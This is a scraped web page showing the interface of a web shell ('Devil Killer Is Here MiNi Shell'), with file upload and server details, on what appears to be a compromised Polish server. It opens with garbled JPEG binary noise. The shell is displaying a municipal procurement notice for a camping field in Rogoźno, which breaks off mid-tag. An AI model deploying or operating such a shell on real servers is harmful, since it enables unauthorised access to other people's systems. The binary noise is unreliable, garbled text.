JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220408/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220408/0011635002-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Utworzenie pola biwakowego dla mieszkańców i turystów odwiedzających Gminę Rogoźno </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Rogoźno</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Urząd Miejski w Rogoźnie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570791425</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Nowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rogoźno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-610</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@rogozno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rogozno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Utworzenie pola biwakowego dla mieszkańców i turystów odwiedzających Gminę Rogoźno </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-db7d3ff0-b72e-11ec-9f44-6e63702cb2f7</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00116350</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00042316/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Utworzenie pola biwakowego dla mieszkańców i turystów odwiedzających Gminę Rogoźno</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> 3.	Inwestycja jest dofinansowana z udziałem Środków Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich w ramach Programu Rozwoju Obszarów Wiejskich na lata 2014 -2020. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.rogozno.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">miniPrtal<br/>https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3.	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w instrukcji użytkowania systemu miniPortal pod adresem https://miniportal.uzp.gov.pl/instrukcje oraz regulaminie ePUAP.<br/>4.	Wykonawcy przystępując do postępowania o udzielenie zamówienia publicznego akceptują warunki korzystania z miniPortalu, określone w regulaminie miniPortalu oraz zobowiązują się korzystając z miniPortalu do przestrzegania postanowień tego regulaminu.<br/>5.	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz komunikacji wynosi 150 MB.<br/>6.	Za datę przekazania ofert, oświadczenia, o który mowa w art. 125 ust. 1 ustawy, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na ePUAP lub na adres email: dorota.slachciak@rogozno.pl<br/>7.	Zamawiający dopuszcza możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej na adres email: dorota.slachciak@rogozno.pl<br/>8.	Wskazanie osób uprawnionych do komunikowania się z Wykonawcami w związku z toczącym się postępowaniem są:<br/>Maria Domagalska, email: maria.domagalska@rogozno.pl, nr tel. 785-009-415<br/>Dorota Ślachciak, email: dorota.slachciak@rogozno.pl, nr tel. 785-009-418,</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych, zwane dalej „RODO”) (Dz. U. UE. L. 119.1 z 04.05.2016) informuję, iż:<br/>1)	Administratorem danych osobowych jest 4CS Sp. z o.o., ul. Kazimierza Wielkiego 7/5, 65-047 Zielona Góra. Z administratorem można się skontaktować poprzez adres email: iod@rogozno.pl lub pisemnie na adres siedziby administratora;<br/>2)	Administrator wyznaczył inspektora ochrony danych, z którym może się Pani/Pan skontaktować poprzez email iod@rogozno.pl Z inspektorem ochrony danych można się kontaktować we wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych;<br/>3)	zgodnie z treścią art. 6 ust. 1 lit. c RODO Pani/Pana dane osobowe przetwarzane będą w celu realizacji procesu wyboru wykonawcy na podstawie prowadzonego postępowania o udzielenie zamówienia publicznego prowadzonym w trybie podstawowym bez negocjacji, a następnie realizacji postanowień umownych związanych z wykonywanym zamówieniem;<br/>4)	w związku z przetwarzaniem Pani/Pana danych w celach wskazanych powyżej, dane osobowe mogą być udostępniane innym odbiorcom lub kategoriom odbiorców danych osobowych, na podstawie przepisów prawa oraz zawartych umów powierzenia przetwarzania danych, jeżeli wymagane byłoby to w celu realizacji postanowień umownych,<br/>5)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>6)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy – Prawo zamówień publicznych przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>7)	posiada Pani/Pan prawo do:<br/>a)	dostępu do danych osobowych, na podstawie art. 15 RODO, przy czym administrator może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego;<br/>b)	sprostowania lub uzupełnienia danych osobowych, na podstawie art. 16 RODO, przy czym skorzystanie z niniejszego uprawnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą – Prawo zamówień publicznych;<br/>c)	ograniczenia przetwarzania danych osobowych, na podstawie art. 18 RODO, przy czym wystąpienie z żądaniem nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego;<br/>d)	wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych narusza przepisy RODO;<br/>8)	nie przysługuje Pani/Panu prawo do:<br/>a)	usunięcia lub przenoszenia danych osobowych,<br/>b)	wniesienia sprzeciwu wobec przetwarzania danych osobowych;<br/>9)	podanie danych osobowych jest konieczne w celu realizacji postępowania o udzielenie zamówienia publicznego oraz realizacji postanowień umownych. Niepodanie danych będzie skutkowało brakiem możliwości rozpatrzenia oferty złożonej w postępowaniu oraz zawarcia umowy.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">N/D</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">INTZ.271.11.2022.ŚD</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 425458,69 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W ramach realizacji przewiduje się utworzenie pola biwakowego poprzez ustawienie 5 szt. Kompletnie wyposażonych drewnianych domków letniskowych o powierzchni 25 m2 wraz z 8 m2 zadaszonym tarasem i wykonaniem przyłączy prądu, wody i ścieków. Zadanie przewiduje również wykonanie montażu sauny. Kolejnym elementem zapewnienia użytkownikom obiektu będzie wykonanie wymiany oświetlenia pola biwakowego na energooszczędne wykonane w technologii LED.<br/><br/>Utworzenie pola biwakowego poprzez:<br/><br/>1.	Zakup, dostawa i montaż drewnianych domków biwakowych szt. 5. <br/>Opis przygotowania podłoża:<br/>-	wykopy na głębokość 25-40cm,<br/>-	warstwa piasku około 10-15cm,<br/>-	na całą powierzchnię rozłożyć geowłókninę,<br/>-	tłuczeń o grubej frakcji 0-63mm na głębokość 10-30cm (w zależności od głębokości wykopu),<br/>-	zagęścić całość zagęszczarką, <br/>-	kruszywo o drobnej frakcji (pospółkę) 0-16mm na wysokość 5-10cm,<br/>-	zagęścić zagęszczarką,<br/>-	na przygotowanym wypoziomowanym terenie ustawić bloczki fundamentowe,<br/>Opis domku:<br/>Pojedynczy domek letniskowy o min. wymiarze 25,0m2. Domek wykonany z grubego, min. 45 milimetrowego balika łączonego na podwójne pióro - wypust. W środku wydzielone są trzy pomieszczenia tzw. salon z aneksem kuchennym, łazienka i sypialnia. <br/>•	wymiar z el. wystającymi: min. 600x600 cm<br/>•	wymiar bez el. wystających: min. 580x580 cm<br/>•	grubość ściany: min. 45,0 mm<br/>•	wysokość ściany: min. 222 cm<br/>•	wysokość w szczycie: min. 317 cm<br/>•	powierzchnia zabudowy: min. 25 + 8,3 = 33,3 m2<br/>•	powierzchnia dachu: 42 m2<br/>•	kąt nachylenia dachu: 13o, 21o<br/>•	wypust dachu: 164 cm<br/>•	grubość deski dachowej: min. 19 mm<br/>•	pokrycie dachu – gont papa<br/>•	grubość deski podłogowej: min. 28 mm ( na powierzchni całego domku)<br/>•	ilość drzwi drewniane: min. 1x 1590x2000 mm, min. 1x 940x1980 mm, min. 1x 840x1980 mm<br/>•	ilość okien nieotwieralnych: 2x min.630x1800 mm<br/>•	ilość okien uch. rozw.: min. 1x min.800x1050 mm + 1x min. 550x550 mm<br/>•	ilość podw. okien uch. rozw.: 1x min. 1560x1050 mm<br/><br/>Wymiary pomieszczeń:<br/>1.	salon z aneksem kuchennym min. 3,9 m na min. 4,21 m<br/>2.	sypialnia min.2,10 m na min. 2,55 m<br/>3.	łazienka min. 1,615 m na min. 2,10 m<br/>W części zewnętrznej duży taras o min. długości 5,71 m i szerokości min.1,455 cm zapewni miejsce dodatkowego wypoczynku oraz schronienie w bardziej deszczowe dni. Domek został wyposażony w podwójne zespolone szyby w oknach oraz podłogę z deskami tarasowymi o grubości min. 28mm.<br/><br/>2.	Zakup, dostawa i montaż wyposażenia domków biwakowych 5 kpl.<br/>Aneks kuchenny z salonem <br/>Meble kuchenne: <br/>-	szafka stojąca pod zlewozmywak o wymiarach min.60x54 x 82 cm,<br/>-	szafka stojąca dolna dwudrzwiowa min. 80cm x 54x 82 cm<br/>-	szafka pod płytę indukcyjną czteropalnikową min.60x54 x 82 cm,<br/>-	szafki górne wiszące 2 szt. o wymiarach min. 60x 72 cm i 32 cm oraz 1 szt. o wymiarach min. 80 cmx72 cmx32 cm <br/>-	kuchenka indukcyjna 4 palnikowa o wymiarach max. 59x 52 cm<br/>-	lodówka wym. min. 55 cmx 85 cmx 58 cm<br/>-	pralkę min. wymiary 41,2 x 60 x 84 cm , pojemność (maksymalny załadunek) 6 kg, kolor biały, sposób załadunku – od przodu, programator (sterowanie): przyciski, pokrętło<br/>-	stół jadalniany dla 4 osób wraz z krzesłami z oparciem<br/>-	dwuosobowa rozkładana sofa długość min. 2,20 m<br/>-	zlewozmywak stalowy min. wym. 58x50 cm, montaż wpuszczany, jednokomorowy, odpływ 3,5 cal, gł. komory min. 17 cm, z kompletnym syfonem,<br/>-	bateria kuchenna stojąca chrom, <br/>-	przepływowy podgrzewacz wody elektryczny szt. 2, materiał – plastik – metal, napięcie 220-240V, 3,3 KW,<br/>-	przepływowy podgrzewacz wody elektryczny szt. 1, materiał – plastik, napięcie <br/>-	bateria prysznicowa, chrom <br/>-	dwuosobowe łóżko z materacem <br/>•	min. wysokość zagłowia: 51 cm<br/>•	min. wysokość w nogach: 35 cm <br/>Wymiary zewnętrzne:<br/>•	szerokość: 167 cm<br/>•	długość: 207 cm<br/>Min. wymiary wewnętrzne: (pod materac)<br/>•	szerokość: 160 cm <br/>•	długość: 200 cm<br/>•	prześwit pod łóżkiem: 23 cm<br/>•	deska środkowa: 200cm x 6cm x 2 cm<br/>Stelaż:<br/>•	deski 6cm x 2cm - 10 szt.<br/>Łóżko – sosna<br/>-	stolik nocny drewniany jedna (sosna) szuflada i półka. min. wym.<br/>•	szerokość 42 cm<br/>•	głębokość 27 cm<br/>•	wysokość 42 cm<br/>-	wyposażenie łazienki:<br/>•	kabina prysznicowa z brodzikiem min. wymiar ścianki (szer. x wys.) (w cm) 80x195min. wysokość całkowita (w cm) 195<br/>•	szafka z umywalką + kran min. szerokość szafki 60cm, głębokość szafki min. 42 cm, wysokość szafki min. 84 cm,<br/>•	lustro wiszące – okrągłe min. 50 cm,<br/>•	WC kompakt z deską polipropylenową, wolnoopadającą. <br/>•	wieszak na ręcznik – 3 ramienny, metalowy<br/>•	uchwyt na papier toaletowy – kolor metalowy<br/>•	szczotka toaletowa – kolor metalowy<br/>•	lampa sufitowa typu plafon<br/>•	lampka kinkietowa nad lustrem<br/>-	wykonanie montażu elektrycznego ogrzewania<br/>•	grzejnik elektryczny ścienny do salonu szt.1, moc min. 1500W, kolor biały, min. wys. 330mm, min. szer. 1000 mm, min. gr. 97 mm, pokrętło elektroniczne lub ręczne, temperatura w stc. C˚, grzejnik z wtyczką do gniazdek 230 V,<br/>•	grzejnik elektryczny ścienny do sypialni szt. 1, moc min. 500 W, kolor biały, min. wys. 330mm, min. szer. 470 mm, min. gr. 97 mm, pokrętło elektroniczne lub ręczne, temperatura w stc. C˚, grzejnik z wtyczką do gniazdek 230 V,<br/>•	grzejnik elektryczny ścienny łazienkowy drabinkowy szt.1, moc min. 400 W, kolor biały, min. wys. 1060 mm, min. szer. 550 mm, termostat ręczny,<br/>•	podgrzewacz wody pojemnościowy do łazienki.<br/>-	zamontowanie ławo stołu i grilla na tarasie:<br/>•	stół ogrodowy ławo stół z ławkami szt.5, min. wym. 200cmx80cm, materiał drewno, bez oparcia, z impregnacją <br/>-	Grill wolnostojący – przenośny szt.5 min. parametry:<br/>•	szerokość grilla: 75.5 cm<br/>•	wysokość grilla: 95 cm<br/>•	głębokość grilla: 39 cm Min. wym. Rusztu<br/>•	długość rusztu: 71 cm<br/>•	szerokość rusztu: 35 cm<br/>•	cechy dodatkowe:<br/>półka, wiatrochron, pokrywa, kółka, termometr, popielnik, materiał: stal malowana proszkowo + drewno; kolor: czarny mat z elementami drewna;<br/>wbudowany termometr: TAK<br/>min. średnica termometru: 6cm; zakres termometru: 0-500 stopni <br/>wyjmowany popielnik: TAK<br/>min. średnica popielnika: 18 cm <br/>regulowane przesłony na pokrywie: TAK; min. średnica przesłon: 10,5 cm<br/>koła do transportu: TAK <br/>min. dwie składane drewniane półki + jedna stalowa stała pokrywa z uchwytem<br/>trzy ruszty chromowane (główny, dodatkowy podwieszany, na węgiel) <br/>min. wymiary rusztu odwieszanego:67x13 cm; min. wymiary rusztu na węgiel: 66x30 cm<br/>Do formularza ofertowego należy dołączyć kalkulację cenową wszystkich elementów wyposażenia domków biwakowych – załącznik nr 2.<br/><br/>3.	Zakup, dostawa i montaż sauny drewnianej szt.1<br/>Sauna malowana farbami do drewna, kryta gontem bitumicznym. Min. wymiary sauny 3,0 x 2,3 m wysokość 2,3 m. Sauna beczka podzielona na dwie części. W jednej części powinien znajdować się stolik, ławki, barek, drugą części stanowić będzie pomieszczenie do saunowania z zamontowanym piecem elektrycznym.<br/>Opis sauny:<br/>-	obręcz ze stali nierdzewnej<br/>-	drewniane zabezpieczenie pieca<br/>Drzwi:<br/>•	szklane drzwi do sauny<br/>•	drzwi wejściowe drewniane z dwoma oknami (przyciemnione szyby)<br/>-	w ścianie tylnej i przedniej po dwa okna (przyciemniane szyby)<br/>-	stolik w przedpokoju<br/>-	4 ławki saunie i 2 w przedpokoju<br/>-	w podłodze montowane wentylacja<br/>-	schodek do sauny<br/>-	otwory wentylacyjne 3 szt.<br/>-	piec elektryczny min. 6 kw<br/><br/>4.	Wykonanie przebudowy oświetlenia pola biwakowego<br/>Wykonanie instalacji elektrycznej wraz montaż 20 szt. słupów stożkowych parkowych – z blachy gr. 2,5 mm do wys. 4 m wraz z oprawami typu LED – parametry opraw: strumień świetlny [lm]: 3200-4600, materiał korpusu oprawy – aluminium - zgodnie z załączonym przedmiarem. <br/><br/>5.	Wykonanie skrzynek energetycznych<br/>Wykonanie 6 szt. skrzynek energetycznych. Min. wymiary 580x400x260 mm, max. Głębokość 215 mm, kolor biały lub szary - zgodnie z załączonym przedmiarem. <br/><br/>6.	Wykonanie zdrojów biwakowych do poboru wody<br/>Wymiary rur zew. 63 mm, długość 80 m, materiał polietytlen – przy wycenie należy posługiwać się załączonym przedmiarem.<br/>Do oferty należy załączyć wycenę zgodną z przedmiarem – przyłącze wodociągowe.<br/>7.	Wykonanie punktu odbioru ścieków z pola biwakowego<br/>Przyłącze o średnicy 160 mm i długości 120 mb – przy wycenie należy posługiwać się załączonym przedmiarem.<br/>Do oferty należy załączyć wycenę zgodną z przedmiarem – przełącza kanalizacji sanitarnej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45212100-7 - Roboty budowlane w zakresie obiektów wypoczynkowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39141000-2 - Meble i wyposażenie kuchni</p> <p class="mb-0">39144000-3 - Meble łazienkowe</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-05-25</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie się kierować następującymi kryteriami oceny ofert.<br/>Lp.	Nazwa kryterium	Znaczenie (waga) kryterium<br/>1	Suma brutto przedmiotu zamówienia	60%<br/>2	Gwarancja	40%<br/>3	SUMA	100%<br/><br/>2.	Sposób punktowania rozpatrywania ofert wg. wag podanych w specyfikacji<br/><br/>a.	Wartość punktowa zostanie obliczona wg. poniższego wzoru:<br/><br/>suma brutto najtańszej oferty<br/>------------------------------------------------------------------------- X waga kryterium <br/>suma brutto zadań badanej oferty<br/><br/>b.	Gwarancja – 40%<br/>Zamawiający w ramach kryterium gwarancji będzie przyznawał punkty za przedstawione w ofercie terminy gwarancji w następujący sposób:<br/>Termin gwarancji 36 miesięcy – oferta otrzyma 10 pkt.<br/>Termin gwarancji 48 miesięcy – oferta otrzyma 20 pkt.<br/>Termin gwarancji 60 miesięcy – oferta otrzyma 30 pkt.<br/>Termin gwarancji 72 miesiące – oferta otrzyma 40 pkt.<br/>Najkrótszy termin gwarancji to 36 miesięcy. Najdłuższy termin gwarancji to 72 miesięcy. <br/><br/>c.	Łączna punktacja<br/>Łączna punktacja jest sumą punktów uzyskanych w kryteriach: Suma ceny brutto przedmiotu zamówienia i Termin gwarancji. Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span 